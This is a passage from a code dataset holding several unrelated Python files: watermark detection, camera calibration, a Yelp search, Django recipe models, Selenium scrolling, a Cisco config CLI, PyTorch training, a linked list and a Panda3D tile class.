logging.getLogger(__name__)\nlogging.basicConfig(\n level=logging.DEBUG,\n format='%(asctime)s %(levelname)s %(name)s %(message)s')\n\n\ndef run():\n this_dir = os.path.dirname(__file__)\n in_file = os.path.join(this_dir, 'out', 'marked.mp4')\n payload = np.array([0, 1, 1, 0, 0, 1, 0, 1])\n print(\"Payload: \", payload)\n\n r = FileDecoder(in_file)\n\n degenerator = DeShuffler(key=0)\n degenerator.set_shape(payload.shape)\n\n frame_extractor = DwtDctSvdDecoder()\n\n video_extractor = Extractor(r, frame_extractor, degenerator)\n video_extractor.start()\n\n\nif __name__ == '__main__':\n run()\n","repo_name":"eluv-io/offmark-py","sub_path":"tests/detect.py","file_name":"detect.py","file_ext":"py","file_size_in_byte":885,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"48"} +{"seq_id":"15451175555","text":"import numpy as np\nfrom numpy import *\nimport cv2\nimport glob\nimport matplotlib.pyplot as plt\n\nW=9\nH=6\n# prepare object points, like (0,0,0), (1,0,0), (2,0,0) ....,(6,5,0)\nobjp = np.zeros((H*W,3), np.float32)\nobjp[:,:2] = np.mgrid[0:W, 0:H].T.reshape(-1,2)\n\n# Arrays to store object points and image points from all the images.\nobjpoints = [] # 3d points in real world space\nimgpoints = [] # 2d points in image plane.\n\n# Make a list of calibration images\nimages = glob.glob('*.jpg')\n\n# Step through the list and search for chessboard corners\nfor idx, fname in enumerate(images):\n img = cv2.imread(fname)\n gray = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n\n # Find the chessboard corners\n ret, corners = cv2.findChessboardCorners(gray, (W,H), None)\n\n # If found, add object points, image points\n if ret == True:\n objpoints.append(objp)\n imgpoints.append(corners)\n\n # Draw and display the corners\n cv2.drawChessboardCorners(img, (W,H), corners, ret)\n #write_name = 'corners_found'+str(idx)+'.jpg'\n #cv2.imwrite(write_name, img)\n cv2.imshow('img', img)\n #print('objpoints= ',objpoints)\n 
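# objpoints and imgpoints grow by one entry for each image in which the full 9x6 corner grid was detected\n        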
#print('imgpoints= ',imgpoints)\n        #cv2.waitKey(100)\n\n#cv2.destroyAllWindows()\n\n\nimport pickle\n\n\n# Test undistortion on an image\nimg = cv2.imread('1.jpg')\nimg_size = (img.shape[1], img.shape[0])\n\n# Do camera calibration given object points and image points\nret, mtx, dist, rvecs, tvecs = cv2.calibrateCamera(objpoints, imgpoints, img_size,None,None)\n\n\ndst = cv2.undistort(img, mtx, dist, None, mtx)\n#cv2.imwrite('test_undist.jpg',dst)\n\n#print('rvecs= ',rvecs)\n\ntvec=tvecs[0]\n\nrmat, _ =cv2.Rodrigues(rvecs[0])\n\nprint('mtx= ',mtx)\n# print('dist= ',dist)\n\n#===================== compute the mean and variance of s ===============================\nfor wpoint,ppoint in zip(objpoints,imgpoints):\n\n    # get the intrinsics and the extrinsics R, t\n    camera_m=np.asmatrix(mtx)\n    R=np.asmatrix(rmat)\n    t=np.asmatrix(tvec)\n\n    # allocate an empty matrix to store s for each point\n    s_set=np.empty([1,W*H])\n    #print(s_set)\n\n    for line in range(W*H):\n\n        # get the pixel and world coordinates\n        world=np.asmatrix(wpoint[line,:]).T\n\n        ori_pixel=np.asmatrix(ppoint[line]).T\n        \n        # convert to obtain [u v 1].T and [X Y 0].T\n        world[2,:]=0\n        w=world\n\n        pixel=np.vstack((ori_pixel,ones([1,1])))\n\n        #print('    ',pixel.T,'| ',w.T)\n\n        # compute the scale parameter s\n        s=pixel.I*camera_m*(R*w+t)\n\n        s_set[0,line]=s\n\n\n#print('var=',s_set.var())\nvar=s_set.var()\nif var >= 2:\n    print('calibration failed')\n\nelse :\n    print('calibration succeeded')\n    \n# write the parameters to a file\n    camera_para={}\n    camera_para[\"camera_m\"] = camera_m\n    camera_para[\"R\"]=R\n    camera_para[\"t\"]=t\n    camera_para[\"s\"]=s_set.mean()\n    pickle.dump( camera_para, open( \"camera_para.p\", \"wb\" ) )\n\n#print('ave=',s_set.mean())\n\n# world1=R.I*camera_m.I*s_set.mean()*pixel-R.I*t\n# print('new world=',world1)\n#===================================================================\n","repo_name":"elebebit/project","sub_path":"whole_procedure/step3/calibration.py","file_name":"calibration.py","file_ext":"py","file_size_in_byte":2998,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}{"seq_id":"3335932116","text":"import requests\r\nimport config\r\n\r\nurl = \"https://api.yelp.com/v3/businesses/search\"\r\nheader = {\r\n    \"Authorization\": \"Bearer \" + config.api_key\r\n}\r\n\r\nparam = {\r\n    \"term\" : \"Barber\",\r\n    \"location\" : \"NYC\"\r\n}\r\n\r\nresponse = requests.get(url, headers = header, params = param)\r\n\r\nbusinesses = response.json()[\"businesses\"]\r\n\r\nnames = [business[\"name\"] for business in businesses if business[\"rating\"] > 4]\r\n\r\nprint(names)","repo_name":"mauriciogbarros/Python_Material","sub_path":"PyYelp/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":422,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}{"seq_id":"2197177021","text":"from django.contrib.auth import get_user_model\nfrom django.core.validators import MinValueValidator\nfrom django.db import models\nfrom django.db.models import UniqueConstraint\n\nfrom .validators import validate_amount\n\nUser = get_user_model()\n\n\nclass Tag(models.Model):\n    \"\"\"Tag model.\"\"\"\n\n    name = models.CharField(\n        max_length=200,\n        unique=True,\n        verbose_name='Название',\n    )\n    color = models.CharField(\n        max_length=7,\n        unique=True,\n        verbose_name='Цвет',\n    )\n    slug = models.SlugField(\n        max_length=200,\n        unique=True,\n        verbose_name='URL',\n    )\n\n    class Meta:\n        verbose_name = 'Тег'\n        verbose_name_plural = 'Теги'\n        ordering = ['name']\n\n    def __str__(self):\n        return self.name\n\n\nclass Ingredient(models.Model):\n    \"\"\"Ingredient model.\"\"\"\n\n    name = models.CharField(\n        max_length=200,\n        
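# free-text ingredient name; unlike Tag.name, uniqueness is not enforced here\n        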
verbose_name='Название',\n    )\n    measurement_unit = models.CharField(\n        max_length=200,\n        verbose_name='Единица измерения',\n    )\n\n    class Meta:\n        verbose_name = 'Ингридиент'\n        verbose_name_plural = 'Ингридиенты'\n        ordering = ['name']\n\n    def __str__(self):\n        return self.name\n\n\nclass Recipe(models.Model):\n    \"\"\"Recipe model.\"\"\"\n\n    name = models.CharField(\n        max_length=200,\n        verbose_name='Название',\n    )\n    text = models.TextField(verbose_name='Рецепт')\n    image = models.ImageField(\n        upload_to='recipes/',\n        verbose_name='Изображение',\n    )\n    cooking_time = models.PositiveIntegerField(\n        validators=[MinValueValidator(1)],\n        verbose_name='Время приготовления мин.',\n    )\n    author = models.ForeignKey(\n        User,\n        on_delete=models.CASCADE,\n        related_name='recipes',\n    )\n    tags = models.ManyToManyField(\n        Tag,\n        through='RecipeTag',\n        related_name='recipes',\n        verbose_name='Теги',\n    )\n    ingredients = models.ManyToManyField(\n        Ingredient,\n        through='RecipeIngredient',\n        related_name='recipes',\n        verbose_name='Ингридиенты',\n    )\n\n    class Meta:\n        verbose_name = 'Рецепт'\n        verbose_name_plural = 'Рецепты'\n        ordering = ['-id']\n\n    def __str__(self):\n        return self.name\n\n\nclass RecipeTag(models.Model):\n    \"\"\"Model linking a tag to recipes.\"\"\"\n\n    tag = models.ForeignKey(\n        Tag,\n        on_delete=models.PROTECT,\n    )\n    recipe = models.ForeignKey(\n        Recipe,\n        on_delete=models.CASCADE,\n    )\n\n    class Meta:\n        verbose_name = 'Рецепт - Тег'\n        verbose_name_plural = 'Рецепты - Теги'\n        ordering = ['-id']\n        constraints = [\n            UniqueConstraint(\n                fields=['recipe', 'tag'],\n                name='unique_recipe_tag',\n            )\n        ]\n\n    def __str__(self):\n        return f'{self.recipe.name} - {self.tag.name}'\n\n\nclass RecipeIngredient(models.Model):\n    \"\"\"Model linking a recipe and its ingredients.\"\"\"\n\n    recipe = models.ForeignKey(\n        Recipe,\n        on_delete=models.CASCADE,\n        verbose_name='Рецепт',\n        related_name='recipeingredients',\n    )\n    ingredient = models.ForeignKey(\n        Ingredient,\n        on_delete=models.PROTECT,\n        verbose_name='Ингридиенты',\n        related_name='recipeingredients',\n    )\n    amount = models.PositiveIntegerField(\n        validators=[validate_amount],\n        verbose_name='Количество',\n    )\n\n    class Meta:\n        verbose_name = 'Рецепт - Ингредиент'\n        verbose_name_plural = 'Рецепты - Ингредиенты'\n        ordering = ['-id']\n        constraints = [\n            UniqueConstraint(\n                fields=['recipe', 'ingredient'],\n                name='unique_recipe_ingredient',\n            )\n        ]\n\n    def __str__(self):\n        return f'{self.recipe.name} - {self.ingredient.name}'\n\n\nclass Follow(models.Model):\n    \"\"\"Model for subscriptions to authors.\"\"\"\n\n    user = models.ForeignKey(\n        User,\n        on_delete=models.CASCADE,\n        related_name='follower',\n        verbose_name='Пользователь',\n    )\n    author = models.ForeignKey(\n        User,\n        on_delete=models.CASCADE,\n        related_name='author',\n        verbose_name='Автор'\n    )\n\n    class Meta:\n        verbose_name = 'Подписка'\n        verbose_name_plural = 'Подписки'\n        ordering = ['user']\n        constraints = [\n            UniqueConstraint(fields=['user', 'author'], name='unique_follow')\n        ]\n\n\nclass ShoppingCart(models.Model):\n    \"\"\"Shopping list model.\"\"\"\n\n    user = models.ForeignKey(\n        User,\n        on_delete=models.CASCADE,\n        related_name='shoppingcarts',\n        verbose_name='Пользователь',\n    )\n    recipe = models.ForeignKey(\n        Recipe,\n        on_delete=models.CASCADE,\n        related_name='shoppingcarts',\n        verbose_name='Рецепт',\n    )\n\n    class Meta:\n        verbose_name = 'Список покупок'\n        verbose_name_plural = 'Списки покупок'\n        ordering = ['user']\n        constraints = [\n            UniqueConstraint(\n                fields=['user', 'recipe'], name='unique_shopingcart'\n            )\n        
]\n\n\nclass Favorite(models.Model):\n    \"\"\"Favorite recipes model.\"\"\"\n\n    user = models.ForeignKey(\n        User,\n        on_delete=models.CASCADE,\n        related_name='favorites',\n        verbose_name='Пользователь',\n    )\n    recipe = models.ForeignKey(\n        Recipe,\n        on_delete=models.CASCADE,\n        related_name='favorites',\n        verbose_name='Рецепт',\n    )\n\n    class Meta:\n        verbose_name = 'Избранное'\n        verbose_name_plural = 'Избранное'\n        ordering = ['user']\n        constraints = [\n            UniqueConstraint(\n                fields=['user', 'recipe'], name='unique_favorite'\n            )\n        ]\n","repo_name":"lllleeenna/foodgram-project-react","sub_path":"backend/foodgram/recipes/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":6252,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}{"seq_id":"72804542225","text":"from selenium import webdriver\r\nfrom webdriver_manager.chrome import ChromeDriverManager\r\nfrom selenium.webdriver.support.wait import WebDriverWait\r\nfrom selenium.webdriver.common.by import By\r\nfrom selenium.webdriver.support import expected_conditions as EC\r\nimport time\r\nclass checkingdate():\r\n    def checked(self):\r\n        driver=webdriver.Chrome(executable_path=ChromeDriverManager().install())\r\n        # driver=webdriver.Chrome(executable_path=\"F:\\\\python\\\\chromedriver\\\\chromedriver.exe\")\r\n        # driver.get(\"https://www.yatra.com/\")\r\n        driver.get(\"https://flight.yatra.com/air-search-ui/dom2/trigger?type=O&viewName=normal&flexi=0&noOfSegments=1&origin=DEL&originCountry=IN&destination=BOM&destinationCountry=IN&flight_depart_date=10%2F04%2F2022&ADT=1&CHD=0&INF=0&class=Economy&source=fresco-home&unqvaldesktop=258193728031\")\r\n        # driver.find_element(By.XPATH,\"//input[@id='BE_flight_origin_date']\").click()\r\n        driver.maximize_window()\r\n        # wait=WebDriverWait(driver,10)\r\n        # all_date=wait.until(EC.element_to_be_clickable((By.XPATH,\"//div[@id='monthWrapper']//tbody//td[@class!='inActiveTD']\")))\\\r\n        #     .find_elements(By.XPATH,\"//div[@id='monthWrapper']//tbody//td[@class!='inActiveTD']\")\r\n        # for date in all_date:\r\n        #     if date.get_attribute(\"data-date\") == \"10/05/2022\":\r\n        #         date.click()\r\n        #         break\r\n        # driver.find_element(By.XPATH,\"//input[@id='BE_flight_flsearch_btn']\").click()\r\n        time.sleep(35)\r\n        pagelength=driver.execute_script(\"window.scrollTo(0,document.body.scrollHeight);var pagelength=document.body.scrollHeight;return document.body.scrollHeight\")\r\n        match=False\r\n        while match==False:\r\n            lastcount=pagelength\r\n            time.sleep(4)\r\n            pagelength=driver.execute_script(\"window.scrollTo(0,document.body.scrollHeight);var pagelength=document.body.scrollHeight;return document.body.scrollHeight\")\r\n            if lastcount== pagelength:\r\n                match=True\r\n\r\n        time.sleep(10)\r\n\r\ncsselem=checkingdate()\r\ncsselem.checked()\r\n","repo_name":"git-pardeep/test_check","sub_path":"pyselenimun/check_excplicity.py","file_name":"check_excplicity.py","file_ext":"py","file_size_in_byte":2065,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}{"seq_id":"38121241950","text":"from sys import exit\nfrom main import ConfigSwitch\nfrom colorama import Fore\n\ndef banner():\n    print('''\n    ▛▀▀▀▀▀▀▀▜ PyCISCO\n    ▌ ▋▋▋▋▋▋▐ by @0xSp3ctra & 
\n    ▌ ▐ v1.0\n    █▙▁▁▁▁▁▟█\n    ''')\n\ndef show_menu():\n    print(\"\\nPlease choose the actions to apply to your device:\\n\")\n    print(Fore.LIGHTBLUE_EX + \"┌─[1] \" + Fore.RESET + \"Give a hostname\")\n    print(Fore.LIGHTBLUE_EX + \"├─[2] \" + Fore.RESET + \"Create enable password\")\n    print(Fore.LIGHTBLUE_EX + \"├─[3] \" + Fore.RESET + \"Create user and password\")\n    print(Fore.LIGHTBLUE_EX + \"├─[4] \" + Fore.RESET + \"Create Vlans\")\n    print(Fore.LIGHTBLUE_EX + \"├─[5] \" + Fore.RESET + \"Add default gateway\")\n    print(Fore.LIGHTBLUE_EX + \"├─[6] \" + Fore.RESET + \"Add ip route\")\n    print(Fore.LIGHTBLUE_EX + \"├─[7] \" + Fore.RESET + \"Configure interfaces\")\n    print(Fore.LIGHTBLUE_EX + \"│ ├─[1] \" + Fore.RESET + \"Add switchports\")\n    print(Fore.LIGHTBLUE_EX + \"│ └─[2] \" + Fore.RESET + \"Change interface speed\")\n    print(Fore.LIGHTBLUE_EX + \"└─[8] \" + Fore.RESET + \"Exit pyCISCO and write configuration file\\n\")\n\ninfos_switch = []\nvlan_id_list = []\nConfigSwitch = ConfigSwitch(InfosSwitch=infos_switch, InfosVlan=vlan_id_list)\n\ndef test(line: str) -> None:\n    print(\n        Fore.YELLOW + f\"[+] New line saved : \\n{line}\" + Fore.RESET if line\n        else Fore.RED + \"\\nInvalid input.\" + Fore.RESET\n    )\n\ndef app_start():\n    show_menu()\n    try:\n        choice = int(input(\"\\nYour selection: \"))\n    except ValueError:\n        print(Fore.RED + \"\\nInvalid option. Please enter 1-8 or press CTRL+C to exit: \\n\" + Fore.RESET)\n        app_start()\n    except KeyboardInterrupt:\n        print(Fore.RED + \"\\nExiting pyCISCO ...\\n\" + Fore.RESET)\n        exit(0)\n    else:\n        if choice == 1:\n            hostname = str(input(\"\\nEnter the name of your device : \"))\n            if hostname:\n                hostname_line = ConfigSwitch.add_hostname(hostname)\n                test(hostname_line)\n\n        elif choice == 2:\n            enable_pwd = str(input(\"\\nEnter the enable password : \"))\n            if enable_pwd:\n                enable_pwd_line = ConfigSwitch.add_enable_pwd(enable_pwd)\n                test(enable_pwd_line)\n\n        elif choice == 3:\n            user_pwd_infos = str(input(\"\\nEnter the infos (username:password:password_type(5,7,8,9)): \"))\n            if user_pwd_infos:\n                user_pwd_device_line = ConfigSwitch.add_user_pwd_line(user_pwd_infos)\n                test(user_pwd_device_line)\n\n        elif choice == 4:\n            vlan_infos = str(input(\"\\nEnter the vlan infos (id:name:ip_address:mask) : \"))\n            if vlan_infos:\n                vlan_config_line = ConfigSwitch.create_vlan(vlan_infos)\n                test(vlan_config_line)\n\n        elif choice == 5:\n            ip = str(input(\"\\nEnter the ip address : \"))\n            if ip:\n                default_gateway_line = ConfigSwitch.add_default_gateway(ip)\n                test(default_gateway_line)\n\n        elif choice == 6:\n            ip_route_infos = str(input(\"\\nEnter the ip infos for ip route (IPdst:MASKdst IPsrc:MASKsrc) : \"))\n            if ip_route_infos:\n                ip_route_line = ConfigSwitch.add_ip_route(ip_route_infos)\n                test(ip_route_line)\n\n        elif choice == 7:\n            interface_config_lines = ConfigSwitch.configure_interface()\n            for interface_config_line in interface_config_lines:\n                test(interface_config_line)\n\n        elif choice == 8:\n            print(Fore.YELLOW + \"\\n[+] Writing configuration in 'config.txt' ...\" + Fore.RESET)\n            ConfigSwitch.write_configuration(infos_switch)\n            print(Fore.YELLOW + \"\\n[+] Configuration written\" + Fore.RESET)\n            exit(0)\n        else:\n            print(Fore.RED + \"\\nInvalid option. 
Please enter 1-8 or press CTRL + C to exit: \n\" + Fore.RESET)\n            app_start()\n\ndef main():\n    banner()\n    while True:\n        app_start()\n\n# Start Here\nif __name__ == \"__main__\":\n    main()","repo_name":"0xSp3ctra/pyCISCO","sub_path":"pycisco.py","file_name":"pycisco.py","file_ext":"py","file_size_in_byte":4094,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}{"seq_id":"13751216682","text":"# The output data is prepared by representing each output as a binary vector of categories\nimport torch.utils.data as utils\nimport torch\nimport torch.nn as nn\nimport numpy as np\nfrom PIL import Image\nfrom torch.autograd import Variable\nfrom torchvision import models, transforms\n\ndataset_size = 45000\nnum_epochs = 1\nlog_interval = 500\n\nvgg_model = models.vgg16(pretrained=True).cuda()\nvgg_features = nn.Sequential(*list(vgg_model.features.children())[:])\nvgg_new = nn.Sequential(*list(vgg_model.classifier.children())[:-2])\n\n# NOTE: cfy_model (the classifier head) and the train/val id mappings are assumed to be defined elsewhere (e.g. an earlier script or notebook cell)\nclass E2E(nn.Module):\n    def __init__(self):\n        super(E2E, self).__init__()\n        self.feature = vgg_features \n        self.fc1 = vgg_new\n        self.fc2 = cfy_model\n    \n    def forward(self, x):\n        x1= self.feature(x)\n        x1 = x1.view(x1.size(0), -1)\n        x2 = self.fc1(x1)\n        out = self.fc2(x2)\n        return out\n    \n#transform image \nimg_size = 224\nloader = transforms.Compose([\n    transforms.Scale(img_size),\n    transforms.CenterCrop(img_size),\n    transforms.ToTensor(),\n]) \n\n#load image \ndef load_image(filename):\n    image = Image.open(filename).convert('RGB')\n    image_tensor = loader(image).float()\n    return image_tensor.cuda()\n\n\ntrain_class = []\nval_class = []\n\n#binary target train vector \nfor train_id in train_ids[:45000]: \n    temp_class = np.zeros(80)\n    for i,category in enumerate(train_id_to_categories[train_id]):\n        temp_class[category_to_idx[category]] = 1\n    \n    train_class.append(temp_class)\n\n#binary target val vector \nfor val_id in val_ids[:100]: \n    temp_class = np.zeros(80)\n    for i,category in enumerate(val_id_to_categories[val_id]):\n        temp_class[category_to_idx[category]] = 1\n    \n    val_class.append(temp_class)\n    \ntensor_x_val = torch.stack([load_image(val_id_to_file[k]) for k in val_ids[:50]]) \ntensor_y_val = torch.stack([torch.Tensor(i) for i in val_class[:50]])\n\n#train fn\ndef train(comb_model,learning_rate,batch_size,num_epochs):\n    \n    criterion = nn.MultiLabelSoftMarginLoss() \n    optimizer = torch.optim.Adam(comb_model.parameters(), lr=learning_rate)\n    \n    for epoch in range(num_epochs):\n        loss_vector_train = [] \n        loss_vector_val = [] \n        for b in range(int(dataset_size/batch_size)):\n            \n            tensor_x = torch.stack([load_image(train_id_to_file[k]) for k in train_ids[batch_size*b:batch_size*(b+1)]])\n            tensor_y = torch.stack([torch.Tensor(i) for i in train_class[batch_size*b:batch_size*(b+1)]])\n            \n            # Convert torch tensor to Variable\n            img = Variable(tensor_x)\n            labels = Variable(torch.FloatTensor(tensor_y)).cuda()\n            \n            comb_model.train()\n            # Forward + Backward + Optimize\n            optimizer.zero_grad() # zero the gradient buffer\n            outputs = comb_model(img)\n            loss_train = criterion(outputs, labels)\n            loss_train.backward()\n            optimizer.step()\n            \n            loss_vector_train.append(loss_train.data[0])\n            \n            comb_model.eval()\n            out_val = comb_model(Variable(tensor_x_val))\n            labels_val = Variable(torch.FloatTensor(tensor_y_val)).cuda()\n            loss_val = criterion(out_val, labels_val)\n            \n            loss_vector_val.append(loss_val.data[0])\n            \n            if (b % log_interval == 0): \n                print('batch %d %.6f %.6f' %(b,loss_train.data[0],loss_val.data[0]))\n    \n    #print(len(loss_vector))\n    np.save(open('outputs/loss_vector_train'+str(learning_rate)+str(batch_size), 'wb+'), loss_vector_train) \n    
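# one pair of loss-curve files is written per (learning_rate, batch_size) configuration\n    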
np.save(open('outputs/loss_vector_val'+str(learning_rate)+str(batch_size), 'wb+'), loss_vector_val) \n \n# Finally train the model\n\nlearning_rate_vec = [0.001,0.0001,0.00001]\nbatch_size_vec = [25,40,50]\nfor lr in learning_rate_vec:\n for bs in batch_size_vec:\n comb_model = E2E()\n comb_model.cuda()\n train(comb_model,lr, bs, num_epochs)\n torch.save(comb_model.state_dict(), './comb_model'+str(lr)+str(bs)+'.pth')\n\n\n\nprint('training done')","repo_name":"kevinbdsouza/ObjectDetection","sub_path":"hyperparameter.py","file_name":"hyperparameter.py","file_ext":"py","file_size_in_byte":3929,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"10500512942","text":"# Linked List in python\n# Node class\n# Node class has a constructor that sets the data passed in, and optionally\n# and prev_node\n# It also has a str method to give a string representation for printing.\n# Note that prev_node is only used for Doubly Linked Lists.\n# Operations: Add, Find, Remove, Print_list\n\n\nclass Node:\n\n def __init__(self, d, n=None, p=None):\n\n self.data = d\n self.next_node = n\n self.prev_node = p\n\n def __str__(self):\n return '(' + str(self.data) + ')'\n\n\nclass LinkedList:\n\n def __init__(self, r=None):\n\n self.root = r\n self.size = 0\n\n def add(self, d):\n\n new_node = Node(d, self.root)\n self.root = new_node\n self.size += 1\n\n def find(self, d):\n\n this_node = self.root\n\n while this_node is not None:\n if this_node.data == d:\n return d\n else:\n this_node = this_node.next_node\n return None\n\n def remove(self, d):\n\n this_node = self.root\n prev_node = None\n\n while this_node is not None:\n\n if this_node.data == d:\n\n if prev_node is not None:\n prev_node.next_node = this_node.next_node\n\n else:\n self.root = this_node.next_node\n self.size -= 1\n return True\n\n else:\n\n prev_node = this_node\n this_node = this_node.next_node\n\n return False\n\n def print_list(self):\n\n this_node = self.root\n while this_node is not None:\n print(this_node, end='->')\n this_node = this_node.next_node\n print('None')\n\n\nmy_list = LinkedList()\nmy_list.add(5)\nmy_list.add(8)\nmy_list.add(12)\nmy_list.print_list()\n\nprint(\"size=\"+str(my_list.size))\nmy_list.remove(8)\nprint(\"size=\"+str(my_list.size))\nprint(my_list.find(5))\nprint(my_list.root)\n\n\n\n","repo_name":"SamanehGhafouri/DataStructuresInPython","sub_path":"linked_list.py","file_name":"linked_list.py","file_ext":"py","file_size_in_byte":1906,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"23144228626","text":"class LightBulb:\n @staticmethod\n def turn_on():\n print(\"LightBulb: turned on...\")\n\n @staticmethod\n def turn_off():\n print(\"LightBulb: turned off...\")\n\n\nclass ElectricPowerSwitch:\n\n def __init__(self, light_bulb: LightBulb):\n self.lightBulb = light_bulb\n self.on = False\n\n def press(self):\n if self.on:\n self.lightBulb.turn_off()\n self.on = False\n else:\n self.lightBulb.turn_on()\n self.on = True\n\n\nif __name__ == '__main__':\n lb = LightBulb()\n switch = ElectricPowerSwitch(lb)\n switch.press()\n switch.press()\n","repo_name":"aviz92/PythonCourses","sub_path":"PythonCourses/BetterPython/N2_dependency_inversion/dependency-inversion-before.py","file_name":"dependency-inversion-before.py","file_ext":"py","file_size_in_byte":624,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"11136124965","text":"from panda3d.core 
import *\r\nimport math\r\n\r\n\r\nclass Tile():\r\n \"\"\"\r\n Create a thin (zscale reduced) tile object based on a polygonal prism,\r\n with the correct texture or colour, with collider nodes at the tips, and\r\n an optional large one (if the tile is square) at the c of g. Shape can be\r\n scaled (scale), and rotated (phase). The symmetric rotation specifier (sym_rot)\r\n was included to identify when a spinning tile could stop spinning - eg 90 degrees\r\n for a square tile vs 180 degrees for a rectagle and 360 degrees for a triangle,\r\n but is not important now that tiles are moved with a fixed orientation.\r\n \"\"\"\r\n\r\n def __init__(self, pos, shape, face_color, tip_rad, p_tag=\"fred\", zscale=0.05, name=\"Tile\",\r\n cg=[0,0], cg_rad=1, sym_rot=90, phase=0, scale=1, hopper=False):\r\n self.sym_rot = sym_rot\r\n self.phase = phase\r\n self.name = p_tag\r\n\r\n if isinstance(face_color, tuple):\r\n # if it is a tuple, then it is an RGBA\r\n self.gNode = TilePoly(shape, face_color)\r\n self.np = render.attachNewNode(self.gNode.node)\r\n self.np.setScale(scale, scale, zscale)\r\n else:\r\n # otherwise assume it is a texture string path\r\n white = (1, 1, 1, 1)\r\n self.gNode = TilePoly(shape, white)\r\n self.np = render.attachNewNode(self.gNode.node)\r\n self.np.setScale(scale, scale, zscale)\r\n tex1 = loader.loadTexture(face_color)\r\n self.np.setTexture(tex1)\r\n self.np.setPos(pos)\r\n self.np.setH(phase)\r\n\r\n colliderNode = CollisionNode(\"collider\" + name)\r\n # Add central collider node\r\n if hopper:\r\n colliderNode.addSolid(CollisionSphere(*cg, 0, (cg_rad + tip_rad)/scale))\r\n # Add the satellite collision solids and location identifier nodes\r\n # at the corners, compensating for scale so that the collision solids\r\n # are the same size regardless of tile scale\r\n for i, corner in enumerate(shape):\r\n colliderNode.addSolid(CollisionSphere(*corner, 0, tip_rad/scale))\r\n corner_node = self.np.attachNewNode('cnr' + str(i))\r\n corner_node.setPos(*corner, 0)\r\n\r\n self.collider = self.np.attachNewNode(colliderNode)\r\n self.collider.setPythonTag(\"owner\", self)\r\n self.collider.show()\r\n\r\n def corner_nodes(self):\r\n return sorted(self.np.findAllMatches('cnr*'), key=lambda np: np.name)\r\n\r\n\r\nclass TilePoly():\r\n \"\"\"\r\n Generate a 3D solid in xyz plane from a 2D polygon in xy plane\r\n \"\"\"\r\n\r\n def __init__(self, shape, face_color):\r\n # 2D Polygon and its 2D normals\r\n self.xys = shape[:]\r\n xy_normals = calcNormals(self.xys)\r\n\r\n \"\"\"\r\n Coverage triangle indices for the top polygonal face (counter clockwise - illustrated) and\r\n bottom polygonal face (clockwise - not shown). Fails for some concave polygons like the cross.\r\n \r\n .4 \r\n . \\\r\n . .3\r\n . . | \r\n . . .2\r\n .. . 
/\r\n 0 --- 1\r\n \"\"\"\r\n tri_top = [[0, vix + 1, vix + 2] for vix in range(len(self.xys) - 2)]\r\n tri_bot = [[0, vix - 1, vix - 2] for vix in range(len(self.xys), 2, -1)]\r\n\r\n # To hold vertex numbers belonging to the rectangular faces whose normals are xy normals\r\n rects = {}\r\n\r\n \"\"\"\r\n Forward (counter clockwise) and back (clockwise) triangle indices for covering rectangular faces\r\n 2 --------- 3\r\n | b f |\r\n | x |\r\n | f b |\r\n 0 --------- 1\r\n \"\"\"\r\n tri_fwd = [[0, 1, 3], [0, 3, 2]]\r\n tri_back = [[1, 0, 2], [1, 2, 3]]\r\n\r\n # Bottom face then top face\r\n zs = [-1, 1]\r\n\r\n # To hold vertex numbers belonging to the bottom and top faces\r\n polys = {}\r\n\r\n # All the vertex positions of the solid\r\n xyzs = [xy + [z] for z in zs for xy in self.xys]\r\n\r\n # There must be 3 separate vertices at each vertex position, each with a different normal,\r\n # which always points outwards from the solid\r\n format = GeomVertexFormat.getV3n3c4()\r\n vertexData = GeomVertexData('prism', format, Geom.UHStatic)\r\n vertexData.setNumRows(3 * len(xyzs))\r\n\r\n vertices = GeomVertexWriter(vertexData, 'vertex')\r\n normals = GeomVertexWriter(vertexData, 'normal')\r\n colors = GeomVertexWriter(vertexData, 'color')\r\n\r\n # sat is saturated 8 bits (+ 1) to use as denominator\r\n sat = 256\r\n white = (1, 1, 1, 1)\r\n brown = (0xa0 / sat, 0x98 / sat, 0x7c / sat, 1)\r\n\r\n for pos_num, xyz in enumerate(xyzs):\r\n edge_fwd = pos_num % len(self.xys)\r\n edge_back = (edge_fwd - 1) % len(self.xys)\r\n edge_nums = [edge_back, edge_fwd]\r\n for i in range(3):\r\n vertices.addData3f(*xyz)\r\n vnum = pos_num * 3 + i\r\n if i in [0, 1]:\r\n edge_num = edge_nums[i]\r\n normal = xy_normals[edge_num] + [0]\r\n rects.setdefault(edge_num, []).append(vnum)\r\n else:\r\n z_vec = xyz[2]\r\n normal = [0, 0, z_vec]\r\n polys.setdefault(z_vec, []).append(vnum)\r\n\r\n normals.addData3f(*normal)\r\n color = white if normal[2] == -1 else face_color\r\n colors.addData4f(color)\r\n\r\n # Store the tessellation triangles, counter clockwise from front.\r\n # Each vertex assigned to a triangle must have a normal vector that\r\n # points outwards from the triangle face, which thus determines which\r\n # of the 3 possible vertexes to chose at any given vertex position.\r\n # Each triangle's vertices should be specified in counter clockwise\r\n # order from the perspective of the vertices' normals (i.e. 
